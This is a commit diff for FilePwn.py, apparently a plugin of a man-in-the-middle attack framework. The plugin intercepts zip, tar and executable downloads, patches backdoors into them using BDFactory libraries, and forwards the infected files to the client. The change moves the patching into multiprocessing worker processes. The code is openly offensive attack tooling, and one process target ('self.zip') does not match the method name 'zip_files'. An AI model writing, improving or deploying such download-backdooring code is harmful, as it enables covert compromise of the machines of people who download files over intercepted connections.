Filepwn plugin now uses multiprocessing to patch binaries

2025-07-07 05:22:15 -07:00 · 2015-04-01 01:11:40 +02:00 · 2015-04-01 01:11:40 +02:00 · df9fd2d12a
commit df9fd2d12a
parent 3e835c3a28
1 changed files with 42 additions and 13 deletions
--- a/plugins/FilePwn.py
+++ b/plugins/FilePwn.py
@ -65,6 +65,8 @@ import shutil
 import random
 import string
 import tarfile
+import multiprocessing
+
 from libs.bdfactory import pebin
 from libs.bdfactory import elfbin
 from libs.bdfactory import machobin
@ -85,6 +87,8 @@ class FilePwn(Plugin):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options

+        self.patched = multiprocessing.Queue()
+
        #FOR FUTURE USE
        self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
        
@ -282,7 +286,8 @@ class FilePwn(Plugin):
                                                   )
                    result = targetFile.run_this()
          
-            return result
+            self.patched.put(result)
+            return

        except Exception as e:
            print 'Exception', str(e)
@ -297,7 +302,8 @@ class FilePwn(Plugin):
        if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
            print "[!] TarFile over allowed size"
            logging.info("TarFIle maxSize met %s", len(aTarFileBytes))
-            return aTarFileBytes
+            self.patched.put(aTarFileBytes)
+            return

        with tempfile.NamedTemporaryFile() as tarFileStorage:
            tarFileStorage.write(aTarFileBytes)
@ -305,7 +311,8 @@ class FilePwn(Plugin):

            if not tarfile.is_tarfile(tarFileStorage.name):
                print '[!] Not a tar file'
-                return aTarFileBytes
+                self.patched.put(aTarFileBytes)
+                return

            compressionMode = ':'
            if formatt == 'gz':
@ -322,7 +329,8 @@ class FilePwn(Plugin):

            if tarFile is None:
                print '[!] Not a tar file'
-                return aTarFileBytes
+                self.patched.put(aTarFileBytes)
+                return

            print '[*] Tar file contents and info:'
            print '[*] Compression:', formatt
@ -408,9 +416,11 @@ class FilePwn(Plugin):
            if wasPatched is False:
                # If nothing was changed return the original
                print "[*] No files were patched forwarding original file"
-                return aTarFileBytes
+                self.patched.put(aTarFileBytes)
+                return
            else:
-                return ret
+                self.patched.put(ret)
+                return

    def zip_files(self, aZipFile):
        "When called will unpack and edit a Zip File and return a zip file"
@ -420,7 +430,8 @@ class FilePwn(Plugin):
        if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
            print "[!] ZipFile over allowed size"
            logging.info("ZipFIle maxSize met %s", len(aZipFile))
-            return aZipFile
+            self.patched.put(aZipFile)
+            return

        tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
        tmpDir = '/tmp/' + tmpRan
@ -520,9 +531,11 @@ class FilePwn(Plugin):

        if wasPatched is False:
            print "[*] No files were patched forwarding original file"
-            return aZipFile
+            self.patched.put(aZipFile)
+            return
        else:
-            return tempZipFile
+            self.patched.put(tempZipFile)
+            return

    def handleResponse(self, request, data):

@ -533,7 +546,13 @@ class FilePwn(Plugin):
            
            if self.bytes_have_format(data, 'zip'):
                logging.info("%s Detected supported zip file type!" % client_ip)
-                bd_zip = self.zip_files(data)
+                
+                process = multiprocessing.Process(target=self.zip, args=(data,))
+                process.daemon = True
+                process.start()
+                process.join()
+                bd_zip = self.patched.get()
+                
                if bd_zip:
                    logging.info("%s Patching complete, forwarding to client" % client_ip)
                    return {'request': request, 'data': bd_zip}
@ -542,7 +561,13 @@ class FilePwn(Plugin):
                for tartype in ['gz','bz','tar']:
                    if self.bytes_have_format(data, tartype):
                        logging.info("%s Detected supported tar file type!" % client_ip)
-                        bd_tar = self.tar_files(data)
+                        
+                        process = multiprocessing.Process(target=self.tar_files, args=(data,))
+                        process.daemon = True
+                        process.start()
+                        process.join()
+                        bd_tar = self.patched.get()
+                        
                        if bd_tar:
                            logging.info("%s Patching complete, forwarding to client" % client_ip)
                            return {'request': request, 'data': bd_tar}
@ -556,8 +581,12 @@ class FilePwn(Plugin):
                    with open(tmpFile, 'w') as f:
                        f.write(data)
            
-                    patchb = self.binaryGrinder(tmpFile)
-                    
+                    process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
+                    process.daemon = True
+                    process.start()
+                    process.join()
+                    patchb = self.patched.get()
+
                    if patchb:
                        bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
                        os.remove('./backdoored/' + os.path.basename(tmpFile))